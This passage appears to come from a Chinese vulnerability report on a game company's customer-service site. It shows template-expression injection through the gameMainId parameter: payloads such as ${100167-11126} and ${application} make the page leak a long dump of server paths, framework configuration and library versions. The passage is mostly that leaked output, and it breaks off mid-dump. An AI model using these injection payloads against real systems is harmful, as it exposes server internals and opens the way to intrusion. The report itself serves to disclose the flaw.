2Flib%2Fclasses12.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fbsh-deployer.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fstruts2-tabletags.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fjstl.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fbin%2Frun.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp112530474983911386hibernate3.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Flog4j-boot.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-validator-1.3.0.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-jsr77.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp7886344676930699333jboss-hibernate.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp6517159087966278511commons-el.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fdom4j.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Fdeploy%2Fjboss-ws4ee.sar%2F%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-jca.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp4302262592943089697jboss-ha-xa-jdbc.rar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-chain-1.1.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3101766708196706282servlets-default.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp8163783107672278399tomcat55-service.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp1928911703526671619servlets-invoker.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp4302262592943089697jboss-ha-xa-jdbc.rar-contents%2Fjboss-ha-xa-jdbc.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3235264501345629664javassist.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fwebcallbackhandler.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjmx-adaptor-plugin.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fbindingservice-plugin.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Fdeploy%2Fjbossweb-tomcat55.sar%2F%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjavax.servlet.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fjboss-jmx.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fautonumber-plugin.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp77632742320883920jasper-runtime.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fjsonplugin-0%5B1%5D.31.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-monitoring.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5913486598487930136trove.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-io-1.3.2.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp2498765583516090332tomcat-http.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fdwr-1.1-beta-3.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp8171336813031228483axis-ws4ee.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp6336219452933413902antlr-2.7.5H3.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-httpclient-3.1.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fhsqldb.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fognl-2.6.11.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3332293537302222734catalina.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fhsqldb-plugin.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5458039299239960074tomcat-ajp.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-collections-3.1.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp4440913937618162919cglib-2.1.jar%3A%2Fusr%2Fjava%2Fjdk1.6.0_25%2Fjre%2Flib%2Fext%2Fsunjce_provider.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp6346206992602066763jboss-aop.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp4079816805034329639jboss-local-jdbc.rar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3151033304315455207jboss-xa-jdbc.rar-contents%2Fjboss-xa-jdbc.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Ffreemarker-2.3.8.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Flog4j-1.2.8.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fcommons-httpclient.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fconcurrent.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fcommons-logging.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Fclasses%2F%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fxmlrpc-2.0.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3702522107702055184commons-modeler.jar%3A%2Fusr%2Fjava%2Fjdk1.6.0_25%2Fjre%2Flib%2Fext%2Fdnsns.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fjdom.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fbsh-1.3.0.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-j2ee.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fstruts2-codebehind-plugin-2.0.11.2.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp1099151691146069103wsdl4j.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp6237404052211161026naming-resources.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fendorsed%2Fxalan.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fezmorph-1.0.6.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp4325827586775467154mail-ra.rar-contents%2Fmail-ra.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp393639702798507697commons-discovery.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Foro-2.0.8.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-lang-2.3.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fmail.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjpl-pattern.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fendorsed%2FxercesImpl.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fmail-plugin.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp7318690147406926801jboss-ha-local-jdbc.rar-contents%2Fjboss-ha-local-jdbc.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Fdeploy%2Fjboss-hibernate.deployer%2F%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2F%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Factivation.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjnpserver.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fscheduler-plugin-example.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-jaxrpc.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fstruts2-core-2.0.11.2.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Fdeploy%2Fjbossweb-tomcat55.sar%2FROOT.war%2F%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-saaj.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Fconf%2F%3A%2Fusr%2Fjava%2Fjdk1.6.0_25%2Flib%2Ftools.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjbossmq.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp6144956477623102918catalina-manager.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp8301739402364757125tomcat-util.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fscout.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fproperties-plugin.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3285496549751174622jboss-aspect-library.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjavax.servlet.jsp.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fantlr-2.7.2.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fgnu-regexp.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fstruts2-pell-multipart-plugin-2.0.11.2.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5900502660985595292catalina-optional.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-fileupload-1.2.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-transaction.jar%2C+org.apache.catalina.WELCOME_FILES%3D%5BLjava.lang.String%3B%40114d662%2C+org.apache.catalina.resources%3Dorg.apache.naming.resources.ProxyDirContext%40106c6be%7D&gameMainId=4


地址2:http://kefu.linekong.com/eService/system/inputLogin.do?gameId=10&gameMainId=${100167-11126}
测试效果:

QQ图片20150623144930.png


打开该地址,并查看源代码:http://kefu.linekong.com/eService/system/inputLogin.do?gameId=10&gameMainId=4${application}

src="/eService/system/generateRandomcode.do?gameId=10&gameMainId=%7Bfreemarker.Configuration%3Dfreemarker.template.Configuration%40109037d%2C+javax.servlet.context.tempdir%3D%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Fwork%2Fjboss.web%2Flocalhost%2FeService%2C+org.apache.catalina.jsp_classpath%3D%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp1995774417485222525servlets-webdav.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp7318690147406926801jboss-ha-local-jdbc.rar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fnamespace.jar%3A%2Fusr%2Fjava%2Fjdk1.6.0_25%2Fjre%2Flib%2Fext%2Flocaledata.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-logging-api-1.1.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-logging-1.0.4.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcatalina.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-management.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2FlinkongXworkExt-1.0.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Flucene-core-2.4.0.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp4325827586775467154mail-ra.rar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp7316256627554902626jasper-compiler-jdt.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3920996984715942540jboss-ws4ee.war%2F%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp7302355716144682924jasper-compiler.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Fdeploy%2Fjboss-aop.deployer%2F%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fstruts2-config-browser-plugin-2.0.11.2.jar%3A%2Fusr%2Fjava%2Fjdk1.6.0_25%2Fjre%2Flib%2Fext%2Fsunpkcs11.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fxwork-2.0.5.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fstandard.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fjboss-system.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp9054605725472407847uuid-key-generator.sar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp4721933770079764377asm.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp7736534739160670581odmg-3.0.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fendorsed%2Fxml-apis.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fendorsed%2Fresolver.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjbosssx.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp6494116799749547601asm-attrs.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-beanutils-1.6.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp4079816805034329639jboss-local-jdbc.rar-contents%2Fjboss-local-jdbc.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fjson-lib-2.2.3-jdk15.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fojdbc14.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3338334323483414043tomcat-coyote.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-common-jdbc-wrapper.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fjboss-common.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Flog4j.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp7388988018869166078jboss-ws4ee.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fbcel.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fsnmp-support.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3107141233706702374hibernate-metadata.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3151033304315455207jboss-xa-jdbc.rar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2FlinekongUtil.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjpl-util.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-codec-1.3.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fjaxen.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fscheduler-plugin.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fedb.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fclasses12.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fbsh-deployer.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fstruts2-tabletags.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fjstl.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fbin%2Frun.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp112530474983911386hibernate3.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Flog4j-boot.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-validator-1.3.0.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-jsr77.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp7886344676930699333jboss-hibernate.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp6517159087966278511commons-el.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fdom4j.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Fdeploy%2Fjboss-ws4ee.sar%2F%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-jca.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp4302262592943089697jboss-ha-xa-jdbc.rar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-chain-1.1.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3101766708196706282servlets-default.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp8163783107672278399tomcat55-service.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp1928911703526671619servlets-invoker.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp4302262592943089697jboss-ha-xa-jdbc.rar-contents%2Fjboss-ha-xa-jdbc.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3235264501345629664javassist.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fwebcallbackhandler.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjmx-adaptor-plugin.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fbindingservice-plugin.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Fdeploy%2Fjbossweb-tomcat55.sar%2F%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjavax.servlet.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fjboss-jmx.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fautonumber-plugin.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp77632742320883920jasper-runtime.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fjsonplugin-0%5B1%5D.31.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-monitoring.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%